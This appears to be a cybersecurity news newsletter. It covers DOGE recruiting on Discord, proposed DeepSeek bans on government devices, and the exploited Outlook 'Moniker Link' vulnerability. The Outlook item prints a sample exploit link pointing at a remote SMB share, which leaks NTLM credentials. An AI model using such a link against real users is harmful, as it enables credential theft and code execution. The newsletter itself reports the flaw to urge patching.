Cybersecurity Headlines: Musk’s DOGE Recruitment, DeepSeek Bans, and Outlook Vulnerabilities

Welcome to The RANt Report, your go-to for the latest cybersecurity news, insights, and trends. Whether you’re looking for analysis, industry updates, or a touch of humour, we’ve got you covered!

DOGE Discord: Musk’s Recruitment Drive for Efficiency

Elon Musk’s Department of Government Efficiency (DOGE) is making waves - and not just for its name. According to a Wired report, recruitment efforts for the highly scrutinised agency have included outreach via Discord servers and online chat groups. Yes, the same Discord you use to debate whether pineapple belongs on pizza is now the stage for finding engineers to "fix" government inefficiencies.

The DOGE team reportedly used chat groups tied to SpaceX interns, Palantir alumni, and even a server connected to a Space Force AI program to recruit “hardcore engineers.” Messages included tantalising calls like: “Send your GitHub/LinkedIn to @DOGE on X if you’re interested or know someone who is.” A LinkedIn profile, GitHub repo, and presumably a willingness to stare into the existential void of government bureaucracy are all that’s required.

Leading the charge is Steve Davis, Musk’s long-time ally in cost-cutting at companies like SpaceX and The Boring Company. He’s reportedly roped in former Palantir employees like Anthony Jancso to help with the hunt. The team even promises a shot at cutting federal spending by a third.

However, it’s not all smooth sailing for the DOGE dream team. Internal controversies have arisen, such as a staffer quitting over exposed racist social media posts (but don’t worry, Musk promised to rehire him), and protests have erupted over DOGE’s heavy-handed approach. Meanwhile, a federal judge has temporarily barred DOGE from accessing Treasury systems. Musk responded diplomatically with, “We spent the weekend feeding USAID into the wood chipper.”

The efficiency revolution is here, and it’s powered by Discord invites and spicy soundbites. Whether that’s a recipe for success or disaster remains to be seen.

DeepSeek Ban: Congress Says No to AI Snooping

Move over, TikTok; there’s a new app under the congressional microscope. The U.S. House has introduced bipartisan legislation to ban DeepSeek, a Chinese-developed AI app, from all federal devices. Apparently, Congress isn’t keen on letting the Chinese Communist Party (CCP) sneak a peek at government secrets - or your poorly formatted PowerPoint slides.

Reps. Josh Gottheimer (D-N.J.) and Darin LaHood (R-Ill.) proposed the “No DeepSeek on Government Devices Act,” citing concerns about surveillance and disinformation. Gottheimer stated, “We simply can’t risk the CCP infiltrating our devices and jeopardising national security.” Harsh, but fair - especially when you’re talking about AI that allegedly ships user data straight to Beijing.

The legislation follows a report revealing that DeepSeek’s AI model competes with American giants like OpenAI but was developed at a fraction of the cost. How? That’s the million-yuan question. Add to that some shady code that sends login info to a state-owned Chinese telecom company, and you’ve got the perfect recipe for alarm bells in Washington.

It's not just the US that have taken a dislike to DeepSeek, similar bans have already rolled out worldwide, with Italy, Taiwan, South Korea, and Australia giving the app the boot. Meanwhile, Texas Governor Greg Abbott recently banned both DeepSeek and RedNote (think TikTok’s Chinese cousin) from state devices.

This ban isn’t just about one app. It’s part of a broader tech arms race with China. As Gottheimer puts it: “Americans should know the risks. AI chatbots aren’t just for asking which Hogwarts house you belong to - they’re storing sensitive documents, contracts, and God-knows-what else.”

If passed, the bill will ban DeepSeek from government devices, with exceptions for national security and research purposes. Congress isn’t stopping there - other lawmakers are calling for sweeping bans on Chinese AI tech. Looks like it’s time for the U.S. to level up its AI game.

CVE-2024-21413: Microsoft Outlook’s Latest Security Drama

If you’re still clinging to an old version of Microsoft Outlook, we’ve got bad news - it might be clinging back, to your NTLM credentials, that is. A critical remote code execution (RCE) bug (CVE-2024-21413) in Outlook has officially hit the "actively exploited" category, and the attackers aren’t wasting time.

Discovered by Check Point researcher Haifei Li, the vulnerability, charmingly named "Moniker Link," is the digital equivalent of a sneaky backdoor. This flaw lets cybercriminals bypass Outlook’s Protected View and trick users into opening malicious files, all without needing a formal invitation. Just previewing a cleverly crafted email could give them the keys to your digital kingdom.

The attackers have taken creativity to new heights, exploiting file links with an exclamation mark (!) right after the file extension. Apparently, punctuation is no longer just for grammar enthusiasts. For example:

<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>

This little trick works on vulnerable Office products like Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise, Microsoft Office 2019, and Outlook 2016. The result? Stolen credentials and arbitrary code execution. Not exactly the inbox zero you were hoping for.

CISA (Cybersecurity and Infrastructure Security Agency) has now added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. Federal agencies are required to patch their systems by February 27, and private organisations are strongly advised to follow suit.

CISA warns, “These types of vulnerabilities are frequent attack vectors for malicious actors and pose significant risks.” Translation: patch your systems now, or prepare to explain to your boss why your company got hacked.

What's Happening at The RANt Group?

I’m back from celebrating my 22nd birthday in Prague - don’t worry, no critical vulnerabilities were exploited on my end! And the podcast? It’s almost here. Stay tuned for the first episode dropping soon!

Adam Blackmore

Technical Account Manager, The RANt Group